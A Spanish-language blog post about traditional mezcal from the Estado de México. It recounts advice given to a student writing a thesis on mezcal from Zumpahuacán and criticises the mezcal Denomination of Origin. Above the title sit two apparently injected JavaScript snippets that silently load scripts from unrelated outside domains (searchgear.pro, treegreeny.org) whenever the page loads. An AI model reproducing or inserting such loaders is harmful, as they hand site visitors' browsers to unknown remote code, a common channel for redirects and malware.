;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mezcales Tradicionales de los Pueblos de México » 160. Tesis sobre mezcal del EdoMex

160. Tesis sobre mezcal del EdoMex


Conocí en 2011 a Isabel Montes, estudiante de Relaciones Económicas Internacionales de la Universidad Autónoma del Estado de México. A punto de concluir su licenciatura, estaba interesada en  abordar como tema de tesis la comercialización de mezcal, razón por la que entró en contacto conmigo. Siendo ella originaria de Tenancingo, Estado de México, le sugerí que abordara el tema desde una perspectiva regional y no general como originalmente lo había pensado, pues planeaba estudiar solamente la comercialización de mezcal de los 7 estados que hasta 2011 (en 2013 ya son 8) estaban incluidos, total o parcialmente, en la zona protegida por la Denominación de Origen Mezcal (DOM).

Fundamenté mi sugerencia comentando que: 1) en Zumpahuacán y otros municipios cercanos, se elaboraban mezcales tradicionales (MT) exquisitos con distintas variedades de maguey silvestre; 2) la DOM excluía arbitrariamente a los productores de MT del EdoMex al prohibirles usar la palabra mezcal en sus botellas, violando el derecho a preservar su tradición gastronómica y cultural; 3) la poca seriedad e improvisación con las que se establecieron y sancionaron las Denominaciones de Origen en México, particularmente las de tequila y mezcal, y la urgencia de revisarlas y evaluarlas; 4) consecuencia de lo anterior era el hecho de que ambas Denominaciones de Origen propician, y lo están logrando, la destrucción de los destilados que supuestamente protegen; 5) era necesario plantear formas de protección de los MT del EdoMex, ya fuera a través de la ampliación de la zona de protección de la DOM, aunque ésta se volviera aún más absurda, o a través de Denominaciones de Origen estrictamente delimitadas; 6) se requería profundizar el conocimiento de la región mezcalera de Zumpahuacán, como requisito indispensable para construir opciones de comercialización de sus MT.

Isabel atendió mis comentarios y pronto contaremos con un estudio regional de los MT del EdoMex que sencillamente refutará, sin proponérselo, la ridícula DOM.

http://www.milenio.com/cdb/doc/impreso/9168853

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